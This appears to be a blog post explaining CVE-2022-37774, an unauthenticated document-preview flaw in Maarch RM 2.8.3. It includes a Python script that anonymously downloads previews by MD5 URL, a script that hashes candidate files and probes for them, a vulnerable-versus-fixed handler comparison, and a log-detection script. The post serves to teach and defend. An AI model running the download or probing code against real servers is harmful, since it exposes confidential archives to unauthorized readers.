In today’s digital world, keeping files and digital records private is critical. Maarch RM is a popular open source records management system used in many organizations to manage sensitive archives. In August 2022, researchers uncovered a dangerous broken access control vulnerability in Maarch RM version 2.8.3. Attackers can leverage this to access confidential PDFs and emails—even without logging in—just by knowing or guessing the right URL.

In this post, let’s break down how CVE-2022-37774 works, walk through a real-life example, and show how attackers can exploit this vulnerability with simple code. We’ll also cover where you can find more details and how to stay protected.

What is CVE-2022-37774?

CVE-2022-37774 is a broken access control flaw in Maarch RM 2.8.3: the document preview feature exposes private documents without checking who is asking. Here's how it happens:

The preview feature publishes a temporary copy of the document under a URL that looks like:

  https://{your-maarch-url}/tmp/{MD5 hash of the document}

- This preview link can be accessed without any login. Anyone who knows (or can compute) the MD5 hash can download the confidential archive for as long as the temporary copy exists.
- The hash is derived from the document itself, so it is the same for every copy of the same file and contains no secret; for a document the attacker already holds a copy of, there is nothing to guess.

This is known as a broken access control issue. The application relies on obfuscated URLs (MD5 hashes) to "protect" access, but an obscure URL is not an authorization check, and it is not good enough for confidential files.

Exploiting the Vulnerability: Step by Step

Let’s walk through how an attacker might take advantage of this bug.

1. Finding a Preview URL

When a user previews a document in Maarch RM 2.8.3, the application serves it from a URL like:

https://records.company.com/tmp/a8f5f167f44f4964e6c998dee827110c

The long string (a8f5f167f44f4964e6c998dee827110c) is the MD5 hash of the document.

But the server does *not* check whether the person requesting this URL is logged in or allowed to see the file. Anyone with the link can get the file.

2. Obtaining the Hash

- Intercept Traffic: Attackers with network access can sniff web traffic to find these URLs. Over plain HTTP the path is visible on the wire; over HTTPS it is encrypted in transit, but the same URL still ends up in proxy and web-server logs and in browser history.
- Brute-Forcing: If the files are common (templates, standard forms, documents published elsewhere), attackers can compute the MD5 hashes of candidate files and check whether the resulting URL exists on the server.

3. Downloading the File

Once the attacker has the hash, grabbing the document is trivial.

Example exploit (Python)

import requests

# Base URL of the vulnerable preview directory (no authentication required)
server_url = "https://records.company.com/tmp/"
md5_hash = "a8f5f167f44f4964e6c998dee827110c"  # captured, or computed from a candidate file

file_url = server_url + md5_hash
# No session cookie, no credentials: the request is deliberately anonymous
resp = requests.get(file_url, timeout=10)

if resp.status_code == 200:
    # The preview is typically a PDF or an exported email; the extension here is a guess
    with open("stolen_document.pdf", "wb") as f:
        f.write(resp.content)
    print("Document downloaded successfully!")
else:
    print("File not found or already expired (HTTP %d)." % resp.status_code)

No login, no password—if the hash is valid, the document is yours.

Want to read more? Here are the official sources and advisories

- Original CVE database entry
- French CERT advisory: CERTFR-2022-AVI-915
- GitHub security advisory thread

Why MD5 Is Not Enough

The problem is not a weakness in MD5 itself. A hash of the document contents is a deterministic value that anyone holding the same bytes can compute, and it carries no secret at all. The 128-bit output space cannot be brute-forced blindly, but that does not matter when the documents are predictable: for a standard form, a published template or a company employee handbook, an attacker simply hashes their own copy and requests the resulting URL. Swapping MD5 for SHA-256 would change nothing, because the flaw is the missing access check, not the hash function.
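To make this concrete, and to cover the Brute-Forcing step from the walkthrough above as well, here is an added example written for this post (it is not code from the original advisory or from Maarch RM). It builds the preview URL for a few candidate documents and probes them; the base URL, the candidate document bytes and the `fake_fetch` stand-in for the server are all constructed for the example.

```python
import hashlib

# Constructed stand-ins for documents an attacker could plausibly obtain elsewhere
# (a published template, a standard form). Real targets would be the real files.
CANDIDATE_DOCUMENTS = {
    "employee_handbook_2022.pdf": b"%PDF-1.4\n% constructed placeholder: public handbook\n",
    "expense_claim_form.pdf": b"%PDF-1.4\n% constructed placeholder: standard form\n",
}


def preview_url(base_url, content):
    """Build the preview URL the post describes: <base>/tmp/<MD5 of the document bytes>.
    No secret enters this computation, so anyone holding the same bytes gets the same URL."""
    return base_url.rstrip("/") + "/tmp/" + hashlib.md5(content).hexdigest()


def probe(base_url, candidates, fetch):
    """Hash every candidate and ask fetch(url) whether the preview currently exists.
    fetch is injected so the example runs offline; against a live host it would be
    something like: lambda u: requests.get(u, timeout=10).status_code == 200."""
    hits = {}
    for name, content in candidates.items():
        url = preview_url(base_url, content)
        if fetch(url):
            hits[name] = url
    return hits


def fake_fetch(url):
    """Offline stand-in for the server: only the handbook preview 'exists' right now."""
    expected = hashlib.md5(CANDIDATE_DOCUMENTS["employee_handbook_2022.pdf"]).hexdigest()
    return url.endswith("/tmp/" + expected)


if __name__ == "__main__":
    # Two servers, same bytes, same hash: the URL path is identical everywhere.
    doc = CANDIDATE_DOCUMENTS["employee_handbook_2022.pdf"]
    print(preview_url("https://records.company.com", doc))
    print(preview_url("https://archive.example.org/", doc))
    for name, url in probe("https://records.company.com", CANDIDATE_DOCUMENTS, fake_fetch).items():
        print("hit:", name, "->", url)
```

The only thing the attacker needs is a copy of the file, which is exactly what makes templates and standard forms the first targets; replacing `fake_fetch` with a real HTTP check turns the same loop into the candidate-hash probe described in step 2.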

Bad practice

Relying on hidden URLs or hashed filenames is *never* a substitute for real access control. If the resource is private, require an authentication check and an authorization check on every request, including requests for temporary or preview copies. If a link really must be handed out, make it a random, short-lived token tied to the user who requested it, and keep the file outside the web root so the web server cannot serve it directly.
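The following added example (not Maarch RM's code; the records store, the session dictionaries and the handler names are assumptions made for the illustration) puts a handler that behaves like the vulnerable pattern next to a hardened one, so the difference in checks is visible line by line.

```python
import hashlib
import secrets
import time

# Constructed sample records store: record id -> owner and bytes (not Maarch's data model).
ARCHIVES = {
    "REC-001": {"owner": "alice", "content": b"%PDF-1.4\n% constructed confidential archive\n"},
}
TTL_SECONDS = 300


def is_authorized(user, record_id):
    """Stand-in authorization rule: only the record owner may view it."""
    return ARCHIVES[record_id]["owner"] == user


# --- Vulnerable pattern: a copy named after the content hash, served to whoever asks.
TMP_DIR = {}  # web path -> bytes; stands in for the web-served /tmp/ directory


def publish_preview_vulnerable(record_id):
    content = ARCHIVES[record_id]["content"]
    path = "/tmp/" + hashlib.md5(content).hexdigest()
    TMP_DIR[path] = content
    return path


def serve_vulnerable(path, session=None):
    # Neither the login nor the ownership is checked: the URL is the only "credential".
    return TMP_DIR.get(path)


# --- Hardened pattern: random token, bound to the requesting user, short-lived,
# and every request re-checks both the login and the authorization.
PREVIEWS = {}  # token -> {"record_id", "user", "expires"}


def _require_login(session):
    if not session or "user" not in session:
        raise PermissionError("login required")
    return session["user"]


def publish_preview_fixed(record_id, session, now=None):
    user = _require_login(session)
    if not is_authorized(user, record_id):
        raise PermissionError("not allowed to view this record")
    token = secrets.token_urlsafe(32)  # 256 random bits from the OS CSPRNG, unrelated to the content
    expires = (now if now is not None else time.time()) + TTL_SECONDS
    PREVIEWS[token] = {"record_id": record_id, "user": user, "expires": expires}
    return "/preview/" + token


def serve_fixed(path, session=None, now=None):
    user = _require_login(session)
    entry = PREVIEWS.get(path.rsplit("/", 1)[-1])
    if entry is None or (now if now is not None else time.time()) > entry["expires"]:
        return None  # unknown and expired tokens get the same answer
    if entry["user"] != user or not is_authorized(user, entry["record_id"]):
        raise PermissionError("not allowed to view this record")
    return ARCHIVES[entry["record_id"]]["content"]


if __name__ == "__main__":
    alice = {"user": "alice"}
    leaked = serve_vulnerable(publish_preview_vulnerable("REC-001"))  # no session at all
    print("vulnerable handler, anonymous request:", "leaked" if leaked else "blocked")
    link = publish_preview_fixed("REC-001", alice)
    try:
        serve_fixed(link)  # anonymous
    except PermissionError as err:
        print("fixed handler, anonymous request:", err)
    print("fixed handler, owner request:", "served" if serve_fixed(link, alice) else "blocked")
```

Three properties of the hardened handler matter: the token is random rather than derived from the file, so it cannot be computed from a copy of the document; it is bound to the user who created it and re-authorized on every request, so a leaked link is useless to anyone else; and it expires, so a captured link has a short window even for the original user.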

Responsible Disclosure and Patching

This vulnerability was responsibly disclosed to the Maarch team, which issued updates and mitigations. If you use Maarch RM, upgrade to version 2.8.4 or later.

- Download the patched version from the vendor and follow the vendor's security instructions.
- Do not rely on "obfuscated" URLs or filename hiding for security; require an authentication and authorization check on every request for a preview.
- Monitor server logs for unusual download patterns under /tmp/, in particular successful downloads with no session and bursts of requests for many different hashes from one client.
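As an added example (not from the original post or from Maarch RM), here is a small detection script over constructed web-server access-log lines. The log format, the extra quoted field holding the session cookie, the IP addresses, the hashes and the enumeration threshold are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed access-log lines in combined format plus one extra quoted field holding the
# session cookie ("-" when none was sent). The format, IPs, hashes and cookie names are
# all assumptions made for this example, not real Maarch RM logs.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2022:09:00:01 +0000] "GET /tmp/a8f5f167f44f4964e6c998dee827110c HTTP/1.1" 200 51234 "-" "Mozilla/5.0" "PHPSESSID=abc123"
203.0.113.7 - - [10/Nov/2022:09:00:02 +0000] "GET /tmp/a8f5f167f44f4964e6c998dee827110c HTTP/1.1" 200 51234 "-" "python-requests/2.28" "-"
198.51.100.9 - - [10/Nov/2022:09:00:03 +0000] "GET /tmp/0cc175b9c0f1b6a831c399e269772661 HTTP/1.1" 404 0 "-" "python-requests/2.28" "-"
198.51.100.9 - - [10/Nov/2022:09:00:03 +0000] "GET /tmp/92eb5ffee6ae2fec3ad71c777531578f HTTP/1.1" 404 0 "-" "python-requests/2.28" "-"
198.51.100.9 - - [10/Nov/2022:09:00:04 +0000] "GET /tmp/4a8a08f09d37b73795649038408b5f33 HTTP/1.1" 404 0 "-" "python-requests/2.28" "-"
198.51.100.9 - - [10/Nov/2022:09:00:04 +0000] "GET /tmp/8277e0910d750195b448797616e091ad HTTP/1.1" 200 2048 "-" "python-requests/2.28" "-"
192.0.2.5 - - [10/Nov/2022:09:01:00 +0000] "GET /index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0" "PHPSESSID=def456"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)
PREVIEW_RE = re.compile(r"^/tmp/[0-9a-f]{32}$")  # the vulnerable preview path shape


def parse(log_text):
    """Parse the lines that match the format; unparseable lines are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, log_text.splitlines()) if m]


def find_suspicious(entries, guess_threshold=3):
    """Two signals. (1) A successful /tmp/<md5> fetch with no session cookie: exactly the
    unauthenticated access this CVE allows. (2) Several distinct /tmp/ hashes requested by
    one client: consistent with hashing candidate files and trying each URL."""
    findings = []
    hashes_by_ip = defaultdict(set)
    for e in entries:
        if not PREVIEW_RE.match(e["path"]):
            continue
        hashes_by_ip[e["ip"]].add(e["path"])
        if e["status"] == "200" and e["cookie"] == "-":
            findings.append(("unauthenticated_preview_download", e["ip"], e["path"]))
    for ip, paths in hashes_by_ip.items():
        if len(paths) >= guess_threshold:
            findings.append(("preview_hash_enumeration", ip, f"{len(paths)} distinct hashes"))
    return findings


if __name__ == "__main__":
    for kind, ip, detail in find_suspicious(parse(SAMPLE_LOG)):
        print(f"{kind:32} {ip:14} {detail}")
```

The first signal only works if the cookie is actually logged (for example with `%{Cookie}i` in an Apache LogFormat or `$http_cookie` in an nginx log_format); a legitimate logged-in user also fetches previews from /tmp/, so the absent session is what distinguishes the two. The second signal fires on 404s as well, which is where guessing shows up first. After upgrading, any request at all for a /tmp/ hash that returns 200 is worth an alert, since the preview should no longer be reachable that way.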

Conclusion

*CVE-2022-37774* is a stark example of how broken access control can quickly turn private record keeping solutions into data leaks. Always remember: hashes and secret URLs cannot replace real authorization checks. If you use Maarch RM 2.8.3 or older, update now before your sensitive documents become public.

Further Reading

- OWASP Broken Access Control


*Authored exclusively for you: A simple, practical guide to understanding and exploiting CVE-2022-37774 in Maarch RM.*

Timeline

Published on: 11/23/2022 00:15:00 UTC
Last modified on: 11/26/2022 03:33:00 UTC